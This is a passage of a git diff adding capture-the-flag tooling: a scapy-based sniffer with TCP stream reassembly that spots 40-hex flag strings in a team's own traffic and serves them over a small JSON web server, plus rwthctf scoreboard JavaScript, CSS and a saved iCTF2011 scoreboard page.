list(enumerate(self.seen_flags))[-50:]: + id = e[0] + f = e[1] + + time = str(f[0].time()) + info = f[3].summary() + + if isinstance(f[3], Stream): + r.insert(0, (time,id,f[1],f[2],'stream', info)) + else: + r.insert(0, (time,id,f[1],f[2],'packet', info)) + + return r + + def get_stream(self, path): + try: + i = int(path.split('/')[-1]) + packets = map(lambda x: x.__repr__(), self.seen_flags[i][3].packets) + + return {'packets': packets, 'payload': self.seen_flags[i][3].content} + except: + return None + + def get_packet(self, path): + try: + i = int(path.split('/')[-1]) + return {'packets': [self.seen_flags[i][3].__repr__()], + 'payload': None} + except: + return None + +class CallbackHTTPServer(ThreadingMixIn, HTTPServer): + def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True, funcmap={}): + self.funcmap = funcmap + HTTPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate) + + def add_callback(self, path, func): + self.funcmap[path] = func + +class CallbackHTTPRequestHandler(BaseHTTPRequestHandler): + def do_GET(self): + #try: + if len(self.path): + if self.server.funcmap.has_key(self.path): + self.send_response(200) + self.send_header('content-type', 'application/json') + self.end_headers() + + data = json.dumps(self.server.funcmap[self.path](self.path)) + self.wfile.write(data) + return + else: + for k,v in self.server.funcmap.items(): + if self.path.startswith(k): + self.send_response(200) + self.send_header('content-type', 'application/json') + self.end_headers() + + data = json.dumps(v(self.path[len(k):])) + self.wfile.write(data) + return + #except: + # self.send_error(300, 'We have some problem here.') + req_file = os.path.abspath(os.curdir+self.path) + curdir = os.path.abspath(os.curdir) + if req_file.startswith(curdir) and os.path.isfile(req_file): + self.send_response(200) + if req_file.endswith('.js'): + self.send_header('content-type', 'application/javascript') + elif req_file.endswith('.css'): + self.send_header('content-type', 'text/css') + else: + self.send_header('content-type', 'text/html') + self.end_headers() + + f = open(req_file) + self.wfile.write(f.read()) + f.close() + return + + self.send_error(404, 'File Not Found: %s' % self.path) + +def serve(host="",port=80, handler=CallbackHTTPRequestHandler): + server = CallbackHTTPServer(('', port), CallbackHTTPRequestHandler) + + server.add_callback('/get/flags', at.get_latest_flags) + server.add_callback('/get/stream/', at.get_stream) + server.add_callback('/get/packet/', at.get_packet) + + #try: + # os.setuid(65534) # nobody + #except: + # print 'Could not drop privileges' + + server.serve_forever() + +#class ThreadedSniffer(Thread): +# def __init__(self, iface, filter, prn): +# Thread.__init__(self) +# self.iface = iface +# self.filter = filter +# self.prn = prn +# +# def run(self): + +if __name__ == '__main__': + if len(sys.argv) < 2: + print 'Usage:', sys.argv[0], ' interface myself' + print 'Usage:', sys.argv[0], ' pcap_file' + sys.exit(1) + + # Get HTML colors + conf.color_theme = scapy.themes.HTMLTheme2() + + if len(sys.argv) == 2: + pcap_file = sys.argv[1] + pkts = rdpcap(pcap_file) + + at = AnalyzedTraffic() + + for p in pkts: + at.add_package(p) + + try: + serve(port=8080) + except KeyboardInterrupt: + sys.exit(0) + else: + interface = sys.argv[1] + myself = sys.argv[2] + + at = AnalyzedTraffic(myself) + + try: + #ThreadedSniffer(iface=interface, prn=at.add_package, filter='host '+myself).start() + #time.sleep(2) + Thread(target=serve, args=["", 8080]).start() + sniff(iface=interface, prn=at.add_package)#, filter='host '+myself) + + except KeyboardInterrupt: + sys.exit(0) + + diff --git a/flag-tracker/pcap-analyzer.py~ b/flag-tracker/pcap-analyzer.py~ @@ -0,0 +1,198 @@ +#!/usr/bin/env python +from scapy.all import * +import sys +import re +import os +from streams import * +import json +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler +from datetime import datetime +from threading import Thread +from SocketServer import ThreadingMixIn +import time + +flag_regex = r'[A-Fa-f0-9]{40}' +#rwthctf +#flag_regex = r'[A-Fa-f0-9]{40}' +#flag_regex = r'HTTP' + +class AnalyzedTraffic(): + def __init__(self, myself=None): + self.myself = myself + self.streams = Streams(myself=myself) + self.seen_flags = [] + + def add_package(self, pkt): + # Let the TCP stream parser do its work... + s = self.streams.parse(pkt) + # if packet contains a flag, put a reference in seen_flags + mg = None + if hasattr(pkt, 'load'): + print 'Has is' + mg = re.search(flag_regex, pkt.load) + if mg: + flag = mg.group(0) + print 'Has ik' + direction = 'unknown' + if pkt.haslayer(IP): + if pkt.getlayer(IP).src == self.myself: + print 'Has ip' + direction = 'out' + elif pkt.getlayer(IP).dst == self.myself: + direction = 'in' + print 'has ip' + if direction == 'unknown': + return + + # either a reference to the packet or to the whole stream + if s: + s.contains_flag = True + self.seen_flags.append((datetime.now(), flag, direction, s)) + else: + self.seen_flags.append((datetime.now(), flag, direction, pkt)) + + def get_latest_flags(self,foo=None): + r = [] + for e in list(enumerate(self.seen_flags))[-50:]: + id = e[0] + f = e[1] + + time = str(f[0].time()) + info = f[3].summary() + + if isinstance(f[3], Stream): + r.insert(0, (time,id,f[1],f[2],'stream', info)) + else: + r.insert(0, (time,id,f[1],f[2],'packet', info)) + + return r + + def get_stream(self, path): + try: + i = int(path.split('/')[-1]) + packets = map(lambda x: x.__repr__(), self.seen_flags[i][3].packets) + + return {'packets': packets, 'payload': self.seen_flags[i][3].content} + except: + return None + + def get_packet(self, path): + try: + i = int(path.split('/')[-1]) + return {'packets': [self.seen_flags[i][3].__repr__()], + 'payload': None} + except: + return None + +class CallbackHTTPServer(ThreadingMixIn, HTTPServer): + def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True, funcmap={}): + self.funcmap = funcmap + HTTPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate) + + def add_callback(self, path, func): + self.funcmap[path] = func + +class CallbackHTTPRequestHandler(BaseHTTPRequestHandler): + def do_GET(self): + #try: + if len(self.path): + if self.server.funcmap.has_key(self.path): + self.send_response(200) + self.send_header('content-type', 'application/json') + self.end_headers() + + data = json.dumps(self.server.funcmap[self.path](self.path)) + self.wfile.write(data) + return + else: + for k,v in self.server.funcmap.items(): + if self.path.startswith(k): + self.send_response(200) + self.send_header('content-type', 'application/json') + self.end_headers() + + data = json.dumps(v(self.path[len(k):])) + self.wfile.write(data) + return + #except: + # self.send_error(300, 'We have some problem here.') + req_file = os.path.abspath(os.curdir+self.path) + curdir = os.path.abspath(os.curdir) + if req_file.startswith(curdir) and os.path.isfile(req_file): + self.send_response(200) + if req_file.endswith('.js'): + self.send_header('content-type', 'application/javascript') + elif req_file.endswith('.css'): + self.send_header('content-type', 'text/css') + else: + self.send_header('content-type', 'text/html') + self.end_headers() + + f = open(req_file) + self.wfile.write(f.read()) + f.close() + return + + self.send_error(404, 'File Not Found: %s' % self.path) + +def serve(host="",port=80, handler=CallbackHTTPRequestHandler): + server = CallbackHTTPServer(('', port), CallbackHTTPRequestHandler) + + server.add_callback('/get/flags', at.get_latest_flags) + server.add_callback('/get/stream/', at.get_stream) + server.add_callback('/get/packet/', at.get_packet) + + #try: + # os.setuid(65534) # nobody + #except: + # print 'Could not drop privileges' + + server.serve_forever() + +#class ThreadedSniffer(Thread): +# def __init__(self, iface, filter, prn): +# Thread.__init__(self) +# self.iface = iface +# self.filter = filter +# self.prn = prn +# +# def run(self): + +if __name__ == '__main__': + if len(sys.argv) < 2: + print 'Usage:', sys.argv[0], ' interface myself' + print 'Usage:', sys.argv[0], ' pcap_file' + sys.exit(1) + + # Get HTML colors + conf.color_theme = scapy.themes.HTMLTheme2() + + if len(sys.argv) == 2: + pcap_file = sys.argv[1] + pkts = rdpcap(pcap_file) + + at = AnalyzedTraffic() + + for p in pkts: + at.add_package(p) + + try: + serve(port=8080) + except KeyboardInterrupt: + sys.exit(0) + else: + interface = sys.argv[1] + myself = sys.argv[2] + + at = AnalyzedTraffic(myself) + + try: + #ThreadedSniffer(iface=interface, prn=at.add_package, filter='host '+myself).start() + #time.sleep(2) + Thread(target=serve, args=["", 8080]).start() + sniff(iface=interface, prn=at.add_package)#, filter='host '+myself) + + except KeyboardInterrupt: + sys.exit(0) + + diff --git a/flag-tracker/rwthctf.js b/flag-tracker/rwthctf.js @@ -0,0 +1,227 @@ +$.facebox.settings.closeImage = '/facebox/closelabel.png'; +$.facebox.settings.loadingImage = '/loading.gif'; + +var timerid = 0; +//var loading = '<img src="/loading.gif" alt="Loading" />'; +var loading = ''; + +var colors = { + down: '#E6ACAC', + broken: '#E8C6A2', + good: '#BBF2B8', + error: '#ACACE6', +}; + +var statestrings = { + 0: 'good', + 1: 'down', + 2: 'broken', + 3: 'error', +}; + +var handlers = { + score: function(info) { + var container = $(document.createElement('div')); + container.append("<h2>Scoreboard</h2><span class='explanation'>(refreshed every 5 seconds)</span>"); + var p = $(document.createElement('p')); + p.append('Click on a service to display details about its status on a certain team.<br/>'); + p.append('Offense and Defense points represent the amount of points gathered compared to the leading team.'); + container.append(p); + + info.scores.sort( function(a, b) { + return b.money - a.money; + } ); + + var table = $(document.createElement('table')); + table.addClass('scoreboard'); + + var tr = $(document.createElement('tr')); + tr.append($(document.createElement('td'))); + for(var idx in info.services) { + tr.append($(document.createElement('th')).text(info.services[idx].label)); + } + tr.append($(document.createElement('th')).text('Offense')) + tr.append($(document.createElement('th')).text('Defense')) + tr.append($(document.createElement('th')).text('Account Balance')) + table.append(tr); + + for(var idx in info.scores) { + var tr = $(document.createElement('tr')); + tr.append($(document.createElement('th')).text(info.scores[idx].name)); + + for(var jdx in info.services) { + var sstate = 'unknown'; + var smsg = 'unknown'; + if (info.scores[idx].states && info.services[jdx].name in info.scores[idx].states && info.scores[idx].states[info.services[jdx].name] !== undefined) { + sstate = statestrings[info.scores[idx].states[info.services[jdx].name].state]; + smsg = info.scores[idx].states[info.services[jdx].name].msg; + } + if (!sstate) sstate = 'error'; + var cell = $(document.createElement('td')).text(sstate); + cell.css({'cursor':'pointer', 'background-color': colors[sstate]}); + cell[0].onclick = function(team, service, msg) { return function () { + $.facebox(msg); + } } (info.scores[idx].id, info.services[jdx].id, smsg); + tr.append(cell); + } + + tr.append($(document.createElement('td')).text(info.scores[idx].ap+"%").css({'background-color': 'white'})); + tr.append($(document.createElement('td')).text(info.scores[idx].dp+"%").css({'background-color': 'white'})); + tr.append($(document.createElement('td')).text('$'+info.scores[idx].money).css({'background-color': 'white'})); + + table.append(tr); + } + + container.append(table); + replaceContent(container); + }, + + market: function(posts) { + var container = $(document.createElement('div')); + container.append("<h2>Black Market</h2><span class='explanation'>Buy and Sell Advisories</span>"); + container.append('<p>You can submit your stuff here: <a class="internal" href="/json/marketsubmission#market">Market submission</a></p>'); + container.append('<h3>Current market</h3>'); + + var table = $(document.createElement('table')); + table.attr("class","market"); + table.append("<tr><th>Description</th><th>Price</th><th>Actions</th></tr>"); + + for(var post in posts) { + post = posts[post]; + var row = $(document.createElement('tr')); + + var description = $(document.createElement('td')); + description.text(post.description); + row.append(description); + + var price = $(document.createElement('td')); + price.addClass('price'); + price.text(post.price); + row.append(price); + + var action = $(document.createElement('td')); + var buy = $(document.createElement('a')); + buy.attr("href",""); + buy.addClass('buy'); + buy.text("Buy"); + action.append(buy); + row.append(action); + + table.append(row); + } + container.append(table); + + replaceContent(container); + }, + + marketsubmission: function(info) { + var container = $(document.createElement('div')); + var marketform = $(document.createElement('form')); + marketform.attr("id","marketform"); + marketform.attr("action","/json/marketsubmission"); + marketform.attr("method","post"); + marketform.append('<h2>Black Market Submission</h2><span class="explanation">Submit your own advisories and earn cash when they are sold.</span>'); + marketform.append('<p>Here, you can sell any weaknesses you have discovered (and hopefully fixed) to other teams for a monetary compensation.<br/>Funds will be added to your account for each sale.<br/>Please note that it is currently not possible to withdraw or update an advisory once it is submitted.</p>'); + marketform.append('<h3>Description</h3><input id="description" type="text" name="description" size="80" value="Description" />'); + marketform.append('<span class="explanation">This will be the only description shown in the Market, so make it to the point.</span>'); + marketform.append('<h3>MSRP</h3><input id="price" type="text" name="price" size="8" value="100" />'); + marketform.append('<span class="explanation">You can suggest a retail price at which we should sell your advisory. We are not required to abide by this suggestion.</span>'); + marketform.append('<h3>Content</h3><textarea id="content" name="content" cols="80" rows="40">Content</textarea>'); + marketform.append('<span class="explanation">Your advisory. Please use formatting similar to <a href="/txt/advisory.txt#">this advisory</a><br/>This means: Hard linebreaks, fixed column limit, no special chars, no tabs.</span>'); + marketform.append('<h3>Submit</h3><input type="submit" value="Send" />'); + container.append(marketform); + replaceContent(container); + $("form#marketform").submit(function() { + var description = $("#description").attr('value'); + var price = $("#price").attr('value'); + var content = $("#content").attr('value'); + $.ajax({ + type: "POST", + url: "/json/marketsubmission", + data: "description=" + description + "&price=" + price + "&content=" + content, + complete: function() { + $("form#marketform").hide(); + var container = $(document.createElement('div')); + container.html("<h3>Submission successful</h3>"); + replaceContent(container); + $("#rwthpage").effect("highlight", {color: '#FFADAD'}, 1000); + } + }); + return false; + }); + }, + +} + +function replaceContent(newContent, onComplete) { + var div; + if(typeof(newContent) == 'string') { + div = $(document.createElement('div')); + div.html(newContent); + } + else { + if(newContent != "") + div = newContent; + } + + div.addClass('rwthpage'); + $(document.body).append(div); + $("#rwthpage").replaceWith(div); + div.attr("id", "rwthpage"); + + $("#rwthpage a").click(linkClickHandler); + if(timerid > -1) + $("#rwthpage").effect("highlight", {color: '#FFADAD'}, 1000); + +} + +var pageRequests = new Array(); + +function linkClickHandler(ev) { + var url = ev.target.href; + var sposition = $(window).scrollTop(); + hash = url.replace(/.*#/, ''); + clearInterval(timerid); + timerid = -1; + + if(url.search('/json/') >= 0) { + $.get(url, { }, function (result, status) { + url = url.replace(/^http:\/\/.+\//, ''); + url = url.replace(/#.*/, ''); + if(url.search('score') >= 0) + timerid = setInterval(function() { linkClickHandler(ev);}, 5000); + + if(handlers[url]) { + handlers[url](result); + } else { + replaceContent(result); + } + }, 'json'); + } else if (url.search('/txt/') >= 0) { + url = url.replace(/^http:\/\/.+\//, 'txt/'); + url = url.replace(/#.*/, ''); + var pre = $(document.createElement('pre')); + pre.load(url); + $("#rwthpage").html(pre); + } else { + url = url.replace(/^http:\/\/.+\//, 'static/'); + url = url.replace(/#.*/, ''); + $("#rwthpage").load(url); + } + + $(window).scrollTop(sposition); + window.location.hash = hash; + $('td.current:first').attr("class",""); + $('a[id=#'+hash+']:first').parent().attr("class","current"); + return false; +} + +$(document).ready( function() { + $("#nav > table > tbody > tr > td > a").click(linkClickHandler); + var hash = window.location.hash; + if(hash != '') { + $('a[id='+ hash + ']:first').click(); + } else { + $('a[id=#news]:first').click(); + } +}); diff --git a/flag-tracker/screen.css b/flag-tracker/screen.css @@ -0,0 +1,83 @@ +div#header { + background-color: #40557A; + height: 60px; + width: auto; + display: block; + margin: 0px 0 40px 0; + position: 0 0; + padding: 7px; + border-bottom: 1px solid #88898B; +} + +a { + text-decoration: none; + color: #000; +} + +tr.in { + background-color: #b3ffa5; +} +tr.out { + background-color: #ffeb74; +} + +span.in { + background-color: #b3ffa5; +} +span.out { + background-color: #ffeb74; +} + +h1 { + margin-left: 5px; + margin-top: 10px; + font: bold 23pt 'Arial' ,sans-serif; + color: #EEF0F2; +} + +td.direction { + text-align: center; +} +td.flag { + text-align: center; + width: 20em; +} +td.info { + text-align: left; +} + +/* Scapy default color theme */ + +span.prompt { color: #0000ff; font-weight: bold; } +span.not_printable { color: #a0a0a0; } +span.layer_name { color: #ff0000; font-weight: bold; } +span.field_name { color: #0000ff; } +span.field_value { color: #ff00ff; } +span.emph_field_name { color: #0000ff; font-weight: bold; text-decoration: underline } +span.emph_field_value { color: #ff00ff; font-weight: bold; text-decoration: underline } +span.packetlist_name { color: #ff0000; font-weight: bold; } +span.packetlist_proto { color: #0000ff; } +span.packetlist_value { color: #ff00ff; } +span.fail { color: #ff0000; font-weight: bold; } +span.success { color: #0000ff; font-weight: bold; } +span.even { color: #000000; font-weight: bold; } +span.odd { color: #000000; } +span.opening { color: #00ffff; } +span.active { color: #000000; } +span.closed { color: #808080; } + +/* Syntax highlighting */ + +.num { color:#2928ff; } +.esc { color:#830000; } +.str { color:#c00000; } +.dstr { color:#818100; } +.slc { color:#838183; font-style:italic; } +.com { color:#838183; font-style:italic; } +.dir { color:#ff0000; } +.sym { color:#000000; } +.line { color:#555555; } +.blue { color:#0000ff; font-style:italic; } +.kwa { color:#000000; font-weight:bold; } +.kwb { color:#00a000; } +.kwc { color:#00a000; } +\ No newline at end of file diff --git a/flag-tracker/streams.py b/flag-tracker/streams.py @@ -0,0 +1,380 @@ +#!/usr/bin/python +#Compiles TCP packets in to associated streams +#Josh Smith +#Rochester Institute of Technology + +from scapy.all import * +from optparse import OptionParser +from subprocess import Popen, PIPE +import os,sys + +conf.verb = 0 + +class Stream: + def __init__(self): + self.packets = [] + self.source_ip = None + self.source_port = None + self.dest_ip = None + self.dest_port = None + self.window = None + self.isn = None + self.seq_num = None + self.ack_num = None + self.handshake = False + self.raw = "" + self.content = "" + self.contains_flag = False + + def summary(self): + return "TCP Stream: "+self.source_ip+':'+str(self.source_port)+ \ + ' -> '+self.dest_ip+':'+str(self.dest_port)+ \ + ' Length: '+str(len(self.raw)) + +class Streams: + def __init__(self, myself=None): + self.filter = filter + self.streams = [] + self.stream = None + self.myself = myself + + def parse(self, packet): + """Returns the related stream""" + + if len(self.streams) > 10000: + self.streams = self.streams[-10000:] + + if not packet.haslayer(TCP): + return None + + plen = 0 + #SYN Packet - New Stream + #print "WINDOW: %s" % str(packet.window) + if packet[TCP].flags == 2: + return self.parse_syn(packet) + + #SYNACK Packet - Response to initial SYN + elif packet[TCP].flags == 18: + return self.parse_synack(packet) + + #ACK - Possible Response to SYNACK or Data Response + elif packet[TCP].flags == 16: + return self.parse_ack(packet) + + #PSHACK - Possible Server pushing data to client + elif packet[TCP].flags == 24: + return self.parse_pshack(packet) + + #FINACK Packet + elif packet[TCP].flags == 17: + return self.parse_finack(packet) + + #FIN PSH Ack Packet + elif packet[TCP].flags == 25: + return self.parse_finpshack(packet) + + #RST ACK + elif packet[TCP].flags == 20: + return self.parse_rstack(packet) + + else: + return None + #continue + + def parse_syn(self, packet): + #print "SYN - New Stream Seq: %d" % packet[TCP].seq + self.stream = Stream() + self.streams.append(self.stream) + self.stream.packets.append(packet) + self.stream.isn = packet[TCP].seq + self.stream.seq_num = packet[TCP].seq + self.stream.source_ip = packet[IP].src + self.stream.source_port = packet[TCP].sport + self.stream.dest_ip = packet[IP].dst + self.stream.dest_port = packet[TCP].dport + + return self.stream + + def parse_synack(self, packet): + #print "SYN-ACK" + if not self.stream: + #print "No Stream Yet...stray SYNACK" + return None + + for i in range(len(self.streams)): + s = self.streams[i] + + if packet[TCP].ack == (s.packets[0][TCP].seq + 1): + #print "Response to SYN found" + self.streams[i].packets.append(packet) + self.streams[i].seq_num = packet[TCP].seq + self.streams[i].ack_num = packet[TCP].ack + + return self.streams[i] + + return None + + def parse_ack(self, packet): + placed = False + #print "ACK" + + if not self.stream: + #print "No Stream Yet...stray ACK" + return 0 + + for i in range(len(self.streams)): + plen = 0 + s = self.streams[i] + if Raw in s.packets[-1]: + plen = len(s.packets[-1][Raw]) + + if packet[IP].src == s.dest_ip and Raw in packet: + if packet[TCP].sport == 80: + data = str(packet[Raw])[str(packet[Raw]).find("\n\n") + 4:] + else: + data = str(packet[Raw]) + + s.raw += data + + if not s.handshake and packet[TCP].seq == (s.packets[0][TCP].seq + 1) and packet[TCP].ack == (s.packets[1][TCP].seq + 1): + #print "Final ACK for handshake found" + self.streams[i].packets.append(packet) + self.streams[i].seq_num = packet[TCP].seq + self.streams[i].ack_num = packet[TCP].seq + self.streams[i].handshake = True + placed = True + + return self.streams[i] + + elif s.handshake and packet[TCP].ack == (s.packets[-1][TCP].seq + plen): + #print "Found stream data - ACK" + self.streams[i].packets.append(packet) + self.streams[i].seq_num = packet[TCP].seq + self.streams[i].ack_num = packet[TCP].ack + placed = True + + if packet[IP].src == self.myself: + self.streams[i].content += '#[#span class=out#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + elif packet[IP].dst == self.myself: + self.streams[i].content += '#[#span class=in#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + else: + self.streams[i].content += '#[#span class=unknwon#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + + return self.streams[i] + + elif s.handshake and packet[TCP].ack == (s.packets[-1][TCP].ack) and packet[TCP].seq == (s.packets[-1][TCP].seq + plen): + #print "Found stream data - ACK" + self.streams[i].packets.append(packet) + self.streams[i].seq_num = packet[TCP].seq + self.streams[i].ack_num = packet[TCP].ack + placed = True + + if packet[IP].src == self.myself: + self.streams[i].content += '#[#span class=out#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + elif packet[IP].dst == self.myself: + self.streams[i].content += '#[#span class=in#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + else: + self.streams[i].content += '#[#span class=unknwon#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + + return self.streams[i] + + elif s.handshake and packet[TCP].seq == (s.packets[-1][TCP].ack): + #print "Found stream data - ACK" + self.streams[i].packets.append(packet) + self.streams[i].seq_num = packet[TCP].seq + self.streams[i].ack_num = packet[TCP].ack + placed = True + + if packet[IP].src == self.myself: + self.streams[i].content += '#[#span class=out#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + elif packet[IP].dst == self.myself: + self.streams[i].content += '#[#span class=in#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + else: + self.streams[i].content += '#[#span class=unknwon#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + + return self.streams[i] + + elif s.handshake and packet[TCP].seq == (s.packets[-1][TCP].seq): + #print "Found stream data - ACK" + self.streams[i].packets.append(packet) + self.streams[i].seq_num = packet[TCP].seq + self.streams[i].ack_num = packet[TCP].ack + placed = True + + if packet[IP].src == self.myself: + self.streams[i].content += '#[#span class=out#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + elif packet[IP].dst == self.myself: + self.streams[i].content += '#[#span class=in#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + else: + self.streams[i].content += '#[#span class=unknwon#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + + return self.streams[i] + + return None + + def parse_pshack(self, packet): + placed = False + #print "PSH-ACK" + if not self.stream: + #print "No Stream Yet...Stray PSH-ACK" + return None + + for i in range(len(self.streams)): + plen = 0 + s = self.streams[i] + if Raw in s.packets[-1]: + plen = len(s.packets[-1][Raw]) + + if not s.handshake: + continue + + if packet[IP].src == s.dest_ip and Raw in packet: + if packet[TCP].sport == 80: + data = str(packet[Raw])[str(packet[Raw]).find("\n\n") + 4:] + else: + data = str(packet[Raw]) + + s.raw += data + + + if s.handshake and packet[TCP].seq == (s.packets[-1][TCP].seq + plen) and packet[TCP].ack == s.packets[-1][TCP].ack: + #print "Found stream data - PSHACK" + self.streams[i].packets.append(packet) + self.streams[i].seq_num = packet[TCP].seq + self.streams[i].ack_num = packet[TCP].ack + placed = True + + if packet[IP].src == self.myself: + self.streams[i].content += '#[#span class=out#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + elif packet[IP].dst == self.myself: + self.streams[i].content += '#[#span class=in#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + else: + self.streams[i].content += '#[#span class=unknwon#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + + return self.streams[i] + + elif s.handshake and packet[TCP].ack == (s.packets[-1][TCP].seq + plen): + #print "Found stream data - PSHACK" + self.streams[i].packets.append(packet) + self.streams[i].seq_num = packet[TCP].seq + self.streams[i].ack_num = packet[TCP].ack + placed = True + + if packet[IP].src == self.myself: + self.streams[i].content += '#[#span class=out#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + elif packet[IP].dst == self.myself: + self.streams[i].content += '#[#span class=in#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + else: + self.streams[i].content += '#[#span class=unknwon#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + + return self.streams[i] + + elif (s.handshake and packet[TCP].seq == (s.packets[-1][TCP].seq)) or (s.handshake and packet[TCP].seq == (s.packets[-1][TCP].ack)): + #print "Found stream data - PSHACK" + self.streams[i].packets.append(packet) + placed = True + + if packet[IP].src == self.myself: + self.streams[i].content += '#[#span class=out#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + elif packet[IP].dst == self.myself: + self.streams[i].content += '#[#span class=in#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + else: + self.streams[i].content += '#[#span class=unknwon#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + + return self.streams[i] + + return None + + def parse_finack(self, packet): + placed = False + + if not self.stream: + return 0 + + for i in range(len(self.streams)): + plen = 0 + s = self.streams[i] + if Raw in s.packets[-1]: + plen = len(s.packets[-1][Raw]) + + if not s.handshake: + continue + + if s.handshake and packet[TCP].ack == s.packets[-1][TCP].seq or (s.handshake and packet[TCP].seq == s.packets[-1][TCP].ack) or (s.handshake and packet[TCP].seq == s.packets[-1][TCP].seq): + #print "Found stream data - FINACK" + self.streams[i].packets.append(packet) + placed = True + + if packet[IP].src == self.myself: + self.streams[i].content += '#[#span class=out#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + elif packet[IP].dst == self.myself: + self.streams[i].content += '#[#span class=in#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + else: + self.streams[i].content += '#[#span class=unknwon#]#'+ \ + '\n'.join(map(lambda x: x.rstrip('\r').__repr__()[1:-1], str(packet[TCP].payload).split('\n'))) +'#[#/span#]#' + + return self.streams[i] + + return None + + def parse_finpshack(self, packet): + placed = False + + if not self.stream: + return 0 + + for i in range(len(self.streams)): + s = self.streams[i] + + if not s.handshake: + continue + + if s.handshake and packet[TCP].seq == s.packets[-1][TCP].ack: + self.streams[i].packets.append(packet) + placed = True + + return self.streams[i] + + return None + + def parse_rstack(self, packet): + placed = False + + if not self.stream: + return 0 + + for i in range(len(self.streams)): + s = self.streams[i] + if not s.handshake: + continue + + if s.handshake and packet[TCP].ack == s.packets[-1][TCP].ack: + self.streams[i].packets.append(packet) + placed = True + + return self.streams[i] + + return None diff --git a/flag-tracker/streams.pyc b/flag-tracker/streams.pyc Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011.info.html b/ictf2011/scoreboard.ictf2011.info.html @@ -0,0 +1,135 @@ + +<!-- saved from url=(0032)http://scoreboard.ictf2011.info/ --> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> +<script src="./scoreboard.ictf2011.info_files/jquery.min.js" type="text/javascript"></script> +<script src="./scoreboard.ictf2011.info_files/highcharts.js" type="text/javascript"></script> + +<style type="text/css"> + +body {background-color:#131a22; +} + +body {background-color:#131a22; +} +.ictf_header +{ + color: #8CA3A1; + font-family:sans-serif; + font-size:32px; + text-aling:center; + background-color: #131a22; + height: 60px; +} + +.main +{ + width: 100%; +margin-left: auto; +margin-right: auto; +} +.radar +{ + width: 100%; + min-width:640px; + height: 400px; + background-color:#131a22; + /*background-image: url('img/radar.jpg'); + background-repeat:repeat;*/ +} + +.graph +{ + min-width:200px; + height: 400px; + background-color: #131a22; + background-size: 100%; + background-repeat:no-repeat; + background-position:center; +} + +.chart +{ + height: 3500px; + width: 100%; + background-color: #131a22; + background-size: 100%; + color: red; + background-position:center; + float:left; + +} + +table.dashboard +{ + width:100%; + border-width: 0px; + border-spacing: 0px; + border-style: none; + border-color: gray; + border-collapse:collapse; +} + +table.dashboard th { + border-width: 0px; + padding: 0px; + border-style: none; + border-color: gray; + background-color: white; + -moz-border-radius: ; +} +table.dashboard td { + border-width: 0px; + padding: 0px; + border-style: none; + border-color: gray; + background-color: white; + -moz-border-radius: ; +} +table.dashboard td.td_radar +{ + width:50%; +} +table.dashboard td.td_graph +{ + width:50%; +} +</style> + +</head><style type="text/css" style="display: none !important; ">/*This block of style rules is inserted by 